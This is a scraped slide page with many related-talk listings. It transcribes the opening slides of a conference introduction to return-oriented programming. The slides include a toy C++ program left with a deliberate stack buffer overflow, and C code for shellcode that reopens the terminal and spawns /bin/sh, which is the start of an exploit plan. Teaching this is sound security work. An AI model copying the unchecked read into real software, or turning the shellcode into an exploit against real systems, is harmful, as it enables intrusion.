I can't work like this (KDE Academy Keynote 2021)
Patricia Aas
 

More Related Content

Similar to Return Oriented Programming, an introduction

02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
Asuka Nakajima
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
GangSeok Lee
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
Linaro
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with Python
Malachi Jones
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
takesako
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)
Giovanni Bechis
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
Sumutiu Marius
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
camsec
 
Flashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacFlashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas Mac
ESET Latinoamérica
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Priyanka Aash
 
Advanced Debugging Using Java Bytecodes
Advanced Debugging Using Java BytecodesAdvanced Debugging Using Java Bytecodes
Advanced Debugging Using Java Bytecodes
Ganesh Samarthyam
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
Moabi.com
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
Mr. Vengineer
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
CODE BLUE
 

Similar to Return Oriented Programming, an introduction (20)

02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with Python
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
Flashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacFlashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas Mac
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
 
Advanced Debugging Using Java Bytecodes
Advanced Debugging Using Java BytecodesAdvanced Debugging Using Java Bytecodes
Advanced Debugging Using Java Bytecodes
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
 

More from Patricia Aas

Telling a story
Telling a storyTelling a story
Telling a story
Patricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
Patricia Aas
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
Patricia Aas
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
Patricia Aas
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
Patricia Aas
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
Patricia Aas
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
Patricia Aas
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
Patricia Aas
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
Patricia Aas
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
Patricia Aas
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
Patricia Aas
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
Patricia Aas
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
Patricia Aas
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Patricia Aas
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)
Patricia Aas
 

More from Patricia Aas (20)

Telling a story
Telling a storyTelling a story
Telling a story
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)
 

Recently uploaded

OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
Rakesh Kumar R
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
timtebeek1
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
Gerardo Pardo-Castellote
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
lorraineandreiamcidl
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
ICS
 
Graspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code AnalysisGraspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code Analysis
Aftab Hussain
 
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdfRevolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
Undress Baby
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
Rakesh Kumar R
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
Łukasz Chruściel
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
TheSMSPoint
 
openEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain SecurityopenEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain Security
Shane Coughlan
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
Grant Fritchey
 
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise EditionWhy Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Envertis Software Solutions
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
mz5nrf0n
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
Google
 
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemUI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
Peter Muessig
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
Aftab Hussain
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
Neo4j
 

Recently uploaded (20)

OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
 
Graspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code AnalysisGraspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code Analysis
 
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdfRevolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
 
openEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain SecurityopenEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain Security
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
 
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise EditionWhy Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
 
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemUI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
 

Return Oriented Programming, an introduction

  • 1. 1 Turtle Sec @pati_gallardo Warning! This presentation has A LOT of assembly Run while you have the chance
  • 2. 2 Return Oriented Programming an introduction NDC Security 2023 Patricia Aas Turtle Sec
  • 3. 3 @pati_gallardo Patricia Aas - Trainer & Consultant C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/they Turtle Sec
  • 5. 5 TurtleSec @pati_gallardo 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } target.cpp @olvemaudal @pati_gallardo The application
  • 7. 7 TurtleSec @pati_gallardo target.cpp 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } The vulnerability Stack allocated buffer Stack Buffer Overflow @pati_gallardo
  • 9. 9 @pati_gallardo Our x86 32-bit shellcode for Linux
  • 10. 10 TurtleSec @pati_gallardo Shellcode Piece of code, typically in machine code, that is delivered and executed as a part of an exploit. Called “shellcode” because a traditional use was to start a shell, for example sh. In real exploits it will deliver some kind of mechanism for further (remote) compromise of the system.
  • 11. 11 TurtleSec @pati_gallardo Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode
  • 12. 12 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 13. 13 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } Write C code for shellcode TurtleSec shellcode.c execve open close
  • 14. 14 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 15. 15 TurtleSec @pati_gallardo $ gcc -Wno-incompatible-pointer-types -m32 -o shellcode shellcode.c $ ./shellcode $ Test C code for shellcode
  • 16. 16 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 17. 17 TurtleSec @pati_gallardo ebx eax ax ah al 32 16 8 bx bh bl ecx cx ch cl edx dx dh dl x86 32-bit Linux syscall convention eax Syscall number ebx 1. argument ecx 2. argument edx 3. argument Registers
  • 18. 18 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c close
  • 19. 19 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x06 unsigned int fd close - calling convention 1. int fd = 0; 2. close(fd); Not in use
